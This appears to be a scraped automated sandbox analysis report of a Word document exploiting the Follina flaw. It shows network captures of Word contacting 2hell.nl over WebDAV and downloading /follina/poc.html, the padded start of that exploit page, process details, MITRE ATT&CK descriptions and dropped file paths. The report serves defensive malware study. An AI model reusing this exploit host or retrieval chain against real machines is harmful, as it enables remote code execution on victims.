2022-08-18 01:26:28 UTC	3	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 66 6f 6c 6c 69 6e 61 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 32 68 65 6c 6c 2e 6e 6c 0d 0a 0d 0a Data Ascii: PROPFIND /follina HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 2hell.nl
2022-08-18 01:26:28 UTC	3	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 18 Aug 2022 01:25:17 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Location: https://2hell.nl/follina/ Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-08-18 01:26:28 UTC	4	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 32 68 65 6c 6c 2e 6e 6c 2f 66 6f 6c 6c 69 6e 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://2hell.nl/follina/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49180	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:29 UTC	4	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 66 6f 6c 6c 69 6e 61 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 32 68 65 6c 6c 2e 6e 6c 0d 0a 0d 0a Data Ascii: PROPFIND /follina/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 2hell.nl
2022-08-18 01:26:29 UTC	4	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 18 Aug 2022 01:25:17 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Allow: GET,HEAD,POST,OPTIONS Content-Length: 357 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-08-18 01:26:29 UTC	5	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 55 52 4c 20 2f 66 6f 6c 6c 69 6e 61 2f 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for the URL /follina/.</p><p>Additionally, a 405 Method Not Allowed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49181	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:29 UTC	5	OUT	GET /follina/poc.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 2hell.nl Connection: Keep-Alive
2022-08-18 01:26:29 UTC	5	IN	HTTP/1.1 200 OK Date: Thu, 18 Aug 2022 01:25:17 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Last-Modified: Mon, 30 May 2022 19:35:11 GMT ETag: "1a76-5e03fc121ca9b" Accept-Ranges: bytes Content-Length: 6774 Connection: close Content-Type: text/html; charset=UTF-8
2022-08-18 01:26:29 UTC	6	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: <!doctype html><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49182	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:29 UTC	12	OUT	HEAD /follina/poc.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 2hell.nl Content-Length: 0 Connection: Keep-Alive
2022-08-18 01:26:29 UTC	12	IN	HTTP/1.1 200 OK Date: Thu, 18 Aug 2022 01:25:18 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Last-Modified: Mon, 30 May 2022 19:35:11 GMT ETag: "1a76-5e03fc121ca9b" Accept-Ranges: bytes Content-Length: 6774 Connection: close Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	03:26:12
Start date:	18/08/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13faa0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fHER4lglqY

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{469EB5A9-1D77-4731-94E0-EE25EED167A3}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{D6F1608A-034A-4693-92DF-9F6F675BC0BA}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\poc[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF80B4F.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D314135.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{FB6581E1-1A5E-4649-84C2-3FA331ABA6D2}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{908054AA-4410-45BE-A60F-B0BC543AE3BB}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9DD68104-9F74-4147-BF67-D8C1A9A331E2}.tmp

C:\Users\user\AppData\Local\Temp\{021E1AC8-4DA2-4E7A-B16F-AFF6C99BD5E3}

C:\Users\user\AppData\Local\Temp\{161C39B1-451E-4070-AE08-AFF8D45B0D9D}

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\fHER4lglqY.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$ER4lglqY.docx

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

Windows Analysis Report
fHER4lglqY